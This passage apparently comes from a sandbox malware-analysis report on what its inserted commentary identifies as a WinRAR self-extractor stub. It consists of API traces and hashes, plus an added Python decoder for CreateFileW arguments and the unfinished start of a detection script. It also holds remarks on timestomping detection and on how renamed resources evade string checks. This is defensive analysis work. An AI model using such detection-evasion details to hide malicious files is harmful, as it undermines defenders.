    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ClassCursorLoadRegister
    • String ID: 0$RarHtmlClassName
    • API String ID: 1693014935-3342523147
    • Opcode ID: bbee496d66d143a6aceb09c2b3ecdbbb12b096518736a66972fea4b4c1f0e71c
    • Instruction ID: 95a045bcd53405bf332300516915b1b0be58b454d0465f08151da70b524d98ab
    • Opcode Fuzzy Hash: bbee496d66d143a6aceb09c2b3ecdbbb12b096518736a66972fea4b4c1f0e71c
    • Instruction Fuzzy Hash: E9F014B1D11218AFCB008F99D984ADEFBB8FB48314F50802EE505B7240D7B85A048FE4
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
    • Instruction ID: 4d55490d28d5c074a9669ab0d69f8b485d0d22e90edf0b33820cb0d0563dd725
    • Opcode Fuzzy Hash: 11928e2537a4dd367eb88350d438216194463e35c46b68634b5d5fb98095dd98
    • Instruction Fuzzy Hash: C4A13A72B007869FDB22CF18C8917AEBBE5EF56310F18416BE5959B382C6388D41C772
    APIs
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,000B8D5C,?,?,?), ref: 000BB7F3
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,000B8D5C,?,?), ref: 000BB837
    • SetFileTime.KERNEL32(?,000B8AEC,?,00000000,?,00000800,?,000B8D5C,?,?,?,?,?,?,?,?), ref: 000BB8B8
    • CloseHandle.KERNEL32(?,?,00000800,?,000B8D5C,?,?,?,?,?,?,?,?,?,?), ref: 000BB8BF
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$Create$CloseHandleTime
    • String ID:
    • API String ID: 2287278272-0
    • Opcode ID: 3b3690a380c1e46ffded94e37ff7fc2deef1d1e3006c87145cbac0cc1835da50
    • Instruction ID: c1724653cc5ce5f549ef8d1f242649c84009c1b3cd2a165fe974099f2d21d172
    • Opcode Fuzzy Hash: 3b3690a380c1e46ffded94e37ff7fc2deef1d1e3006c87145cbac0cc1835da50
    • Instruction Fuzzy Hash: 3141AA31288381ABE721DF24DC55FEEBBE8AF81700F14092DF5D197191DBA4DA48DB52
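    The CreateFileW argument lists above are printed as raw hex. The following decoder is an added example for reading such trace lines; it is not part of the Joe Sandbox report or of the sample's code. The constant names are the documented Win32 values, and the trace string in the usage block is copied from the first call above (ref 000BB7F3). Tokens after the seventh are not parameters: the trace prints a window of stack values, and 000B8D5C falls inside the image, so it is most likely a return address rather than an argument.

```python
"""Decode a CreateFileW argument list copied from a sandbox API trace.

Constant names and values are the documented Win32 ones (winnt.h / fileapi.h).
"""
from typing import Dict, List, Optional

GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION_DISPOSITION = {
    1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
    4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING",
}
FLAGS_AND_ATTRIBUTES = {
    0x00000001: "FILE_ATTRIBUTE_READONLY",
    0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM",
    0x00000020: "FILE_ATTRIBUTE_ARCHIVE",
    0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
    0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x20000000: "FILE_FLAG_NO_BUFFERING",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}


def _bits(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bit mask into names; bits missing from the table stay as a hex remainder."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(f"0x{rest:08X}")
    return names or ["0"]


def _hex(token: str) -> Optional[int]:
    """Trace tokens are bare hex; '?' means the sandbox could not resolve the value."""
    return None if token == "?" else int(token, 16)


def decode_createfilew(arg_text: str) -> Dict[str, object]:
    """Decode the seven CreateFileW parameters from a trace argument list.

    The trace prints more tokens than the call has parameters; the surplus is
    stack content above the arguments and is ignored here.
    """
    tokens = [t.strip() for t in arg_text.split(",")]
    if len(tokens) < 7:
        raise ValueError("CreateFileW has seven parameters")
    access, share, security, disposition, flags, template = (_hex(t) for t in tokens[1:7])
    return {
        "lpFileName": tokens[0],
        "dwDesiredAccess": _bits(access, GENERIC_ACCESS) if access is not None else ["?"],
        "dwShareMode": _bits(share, SHARE_MODE) if share is not None else ["?"],
        "lpSecurityAttributes": "NULL" if security == 0 else tokens[3],
        "dwCreationDisposition": CREATION_DISPOSITION.get(disposition, tokens[4]),
        "dwFlagsAndAttributes": _bits(flags, FLAGS_AND_ATTRIBUTES) if flags is not None else ["?"],
        "hTemplateFile": "NULL" if template == 0 else tokens[6],
    }


def opens_existing_for_metadata(decoded: Dict[str, object]) -> bool:
    """True when the call opens an existing object with backup semantics and no
    read or execute access: the pattern used to reach a file or directory handle
    in order to set timestamps or attributes, not to read or write content."""
    access = decoded["dwDesiredAccess"]
    return (
        decoded["dwCreationDisposition"] == "OPEN_EXISTING"
        and "FILE_FLAG_BACKUP_SEMANTICS" in decoded["dwFlagsAndAttributes"]
        and "GENERIC_READ" not in access
        and "GENERIC_ALL" not in access
    )


if __name__ == "__main__":
    # Argument list as printed for the first CreateFileW call (ref 000BB7F3).
    trace = "?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,000B8D5C,?,?,?"
    for key, value in decode_createfilew(trace).items():
        print(f"{key:>22}: {value}")
```

    Decoded, the call is GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, immediately followed by SetFileTime and CloseHandle. Backup semantics is what lets CreateFile return a handle to a directory, so this is the archiver restoring stored timestamps on files and folders it has just extracted. The same API sequence is also what timestomping looks like, so a SetFileTime-based detection should weigh the process context rather than fire on this pattern alone.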
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen
    • String ID:
    • API String ID: 176396367-0
    • Opcode ID: fcdbbac6433eb15ba66b4fe2883590db0fabd17de6e1234a352f76928d54beb8
    • Instruction ID: d040480e68a3938dd10211eecfdcc00d06c7b56dabda4a9d56db88eef914f304
    • Opcode Fuzzy Hash: fcdbbac6433eb15ba66b4fe2883590db0fabd17de6e1234a352f76928d54beb8
    • Instruction Fuzzy Hash: 2541D871900665AFCB559FA8CD19AEE7BB8EF05311F00002AFD05F7246DB30AE598BE0
    APIs
    • _wcslen.LIBCMT ref: 000B8532
    • _wcslen.LIBCMT ref: 000B8558
    • _wcslen.LIBCMT ref: 000B85EF
    • _wcslen.LIBCMT ref: 000B8657
      • Part of subcall function 000BB966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
      • Part of subcall function 000BB41F: RemoveDirectoryW.KERNEL32(?,?,?,000B8649,?), ref: 000BB430
      • Part of subcall function 000BB41F: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,000B8649,?), ref: 000BB45E
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$DirectoryRemove$CloseFind
    • String ID:
    • API String ID: 973666142-0
    • Opcode ID: e83affd8d3f465c0e914ab22e26759c649bbe4c3e0ae7a2fcf4e1fc6b3fa74ce
    • Instruction ID: ff33ded7dd618f187fa32b7a6e395b1e82da27a9a538931b3177d43abada953d
    • Opcode Fuzzy Hash: e83affd8d3f465c0e914ab22e26759c649bbe4c3e0ae7a2fcf4e1fc6b3fa74ce
    • Instruction Fuzzy Hash: C231D971800658AACF31AF64CC45BEE73ADAF44340F05886AF955A7166EF70DEC5CB90
    APIs
    • MultiByteToWideChar.KERNEL32(?,00000000,62E85006,000D5AC4,00000000,00000000,000D6AF9,?,000D6AF9,?,00000001,000D5AC4,62E85006,00000001,000D6AF9,000D6AF9), ref: 000DDB85
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000DDC0E
    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000DDC20
    • __freea.LIBCMT ref: 000DDC29
      • Part of subcall function 000DA7EE: RtlAllocateHeap.NTDLL(00000000,?,?,?,000D5584,?,0000015D,?,?,?,?,000D6A60,000000FF,00000000,?,?), ref: 000DA820
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
    • String ID:
    • API String ID: 2652629310-0
    • Opcode ID: cfc8418fa0f54325e58423fe63b4f35820497b70b5f246915f77690e310c5ac8
    • Instruction ID: faadae3f4e6fe3b6462c7a101dbaec04165283d2270845c81f5ba37f2db38431
    • Opcode Fuzzy Hash: cfc8418fa0f54325e58423fe63b4f35820497b70b5f246915f77690e310c5ac8
    • Instruction Fuzzy Hash: F9319A72A1020AABDF259F64DC85EEE7BA5EF00720F05456AFC04DA251EB35DD90CBA0
    APIs
    • GetDC.USER32(00000000), ref: 000CB666
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 000CB675
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 000CB683
    • ReleaseDC.USER32(00000000,00000000), ref: 000CB691
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: CapsDevice$Release
    • String ID:
    • API String ID: 1035833867-0
    • Opcode ID: f589d872686c3230aac8d51cd1468fa4941a2e26dacc0f37509fdae73dbda47e
    • Instruction ID: f84935f69bc997eb39fc41d52d426b96da5838159009da3a68dafc8b4c575ba8
    • Opcode Fuzzy Hash: f589d872686c3230aac8d51cd1468fa4941a2e26dacc0f37509fdae73dbda47e
    • Instruction Fuzzy Hash: 1BE08C31A85B20EBD3215BA0BC0DBEA3F64AB9A712F088005FA0596590CBB454808FE1
    APIs
    • _free.LIBCMT ref: 000DC4D4
      • Part of subcall function 000D51D6: IsProcessorFeaturePresent.KERNEL32(00000017,000D51A8,00000000,000DA154,00000000,00000000,00000000,00000016,?,?,000D51B5,00000000,00000000,00000000,00000000,00000000), ref: 000D51D8
      • Part of subcall function 000D51D6: GetCurrentProcess.KERNEL32(C0000417,000DA154,00000000,?,00000003,000DA588), ref: 000D51FA
      • Part of subcall function 000D51D6: TerminateProcess.KERNEL32(00000000,?,00000003,000DA588), ref: 000D5201
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
    • String ID: *?$.
    • API String ID: 2667617558-3972193922
    • Opcode ID: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
    • Instruction ID: 765e9cd902b21eb43d67b5914e17a3e72adf4e00c3a77dc5cac13247093231a9
    • Opcode Fuzzy Hash: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
    • Instruction Fuzzy Hash: C0516C75E0020AAFEF14DFA8C881ABDB7F5EF58314F24816AE855E7341E6759A01CB60
    APIs
    • __EH_prolog.LIBCMT ref: 000B80C3
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000BB966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 000BB991
    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 000B8262
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
    • String ID: :
    • API String ID: 3226429890-336475711
    • Opcode ID: ae13258e08d5db40286b77fe053584477a82d5e65f13b9f7d9e4f4e06c6b3875
    • Instruction ID: 59f2a11796854ea3b0999172a383fbddb64acec4d4cba167285c3d0989faba7d
    • Opcode Fuzzy Hash: ae13258e08d5db40286b77fe053584477a82d5e65f13b9f7d9e4f4e06c6b3875
    • Instruction Fuzzy Hash: 04517471900558AAEB25EB60CC56EEE73BCEF46300F4040A9F609A6093DF749F89CF61
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: }
    • API String ID: 176396367-4239843852
    • Opcode ID: c79ed17de95f8b0c8bbee1a4f5c99d61f17e85c1bf86e5a6e07f0533e0c5e2b8
    • Instruction ID: 84c91c4a96044f6d501b4b1f9628eafa4b66ee150b55827b6454ef37ffc29391
    • Opcode Fuzzy Hash: c79ed17de95f8b0c8bbee1a4f5c99d61f17e85c1bf86e5a6e07f0533e0c5e2b8
    • Instruction Fuzzy Hash: C421DE225083165AE731EB64D845FAFB3ECDF84760F04052EF648C2182EB64DD488BB2
    APIs
      • Part of subcall function 000C0620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 000C063F
      • Part of subcall function 000C0620: GetProcAddress.KERNEL32(000FA1F0,CryptUnprotectMemory), ref: 000C064F
    • GetCurrentProcessId.KERNEL32(?,00000200,?,000C0690), ref: 000C0723
    Strings
    • CryptUnprotectMemory failed, xrefs: 000C071B
    • CryptProtectMemory failed, xrefs: 000C06DA
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AddressProc$CurrentProcess
    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
    • API String ID: 2190909847-396321323
    • Opcode ID: 2d560d48cdee8c5492571eb3c7b1b4d5043bb0114527c66b871d33c80ed06284
    • Instruction ID: bebcd54d02488859a6cc9b454c849b7f389d76e57a48d32b884540e9c0697e6a
    • Opcode Fuzzy Hash: 2d560d48cdee8c5492571eb3c7b1b4d5043bb0114527c66b871d33c80ed06284
    • Instruction Fuzzy Hash: DF110631E04265EBEB195F20DC85FBE3B58EF40B64B01421AFD056F252DB34AD41DE95
    APIs
    • _swprintf.LIBCMT ref: 000BCDE7
      • Part of subcall function 000B4A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B4A33
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: __vswprintf_c_l_swprintf
    • String ID: %c:\
    • API String ID: 1543624204-3142399695
    • Opcode ID: a298fb1751ad1754244656bd96be641a7900b46e1c20822163361f0d629432a7
    • Instruction ID: 0c7ac2d29136efdb291fb0603371362f2f6a988c1fb03417812c8471824a991b
    • Opcode Fuzzy Hash: a298fb1751ad1754244656bd96be641a7900b46e1c20822163361f0d629432a7
    • Instruction Fuzzy Hash: 8601F563104311BAEA346B699C46EEFA7ECEF95360B40441BF454E6183FB30D840C2B1
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,000C2419,?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C2302
    • GetLastError.KERNEL32(?,?,000C248F,?,?,?,?,?,000C2479), ref: 000C230E
      • Part of subcall function 000B76E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000B7707
    Strings
    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000C2317
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
    • String ID: WaitForMultipleObjects error %d, GetLastError %d
    • API String ID: 1091760877-2248577382
    • Opcode ID: 01b1368e8b7f0888ffdaecbc0ca971446abc1457594b6ee82b40877f4c596772
    • Instruction ID: 36387f80e29a4341414b77a9b893df2311e3b0aaba9565e7c13a5955ad52680d
    • Opcode Fuzzy Hash: 01b1368e8b7f0888ffdaecbc0ca971446abc1457594b6ee82b40877f4c596772
    • Instruction Fuzzy Hash: D9D05B3550856137D60123386C09DEE79155F61774F240B15F339691F1CAB40A5142A5
    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,000BED75,?), ref: 000BF5C3
    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,000BED75,?), ref: 000BF5D1
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FindHandleModuleResource
    • String ID: RTL
    • API String ID: 3537982541-834975271
    • Opcode ID: 971d1fe6decb0fd9db21538bf9c5db714d9ccd707a35c729167dfe7db2752d1d
    • Instruction ID: 56aca938ca07d2e310fc0e258adf44d446e55b1524258346ba8535dd6c8a8527
    • Opcode Fuzzy Hash: 971d1fe6decb0fd9db21538bf9c5db714d9ccd707a35c729167dfe7db2752d1d
    • Instruction Fuzzy Hash: 40C0123164479056E67467716C4DF832E985B04B15F050478B701EE1C0DAF9C8408760
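    Several functions above carry strings that identify the stub as a WinRAR self-extractor: the GETPASSWORD1, RENAMEDLG and REPLACEFILEDLG dialog names, the RarHtmlClassName window class, and the CryptProtectMemory / CryptUnprotectMemory failure messages. The following triage script is an added example, not part of the Joe Sandbox report or of WinRAR's code. The marker list is taken from the listing above; the RAR 4 and RAR 5 archive signatures are the documented format magics; the three-marker threshold and the constructed sample buffer are this example's own assumptions, and a repacked or modified stub that renames these resources would evade a string check like this.

```python
"""Triage check for a WinRAR SFX stub: look for the stub's dialog and class
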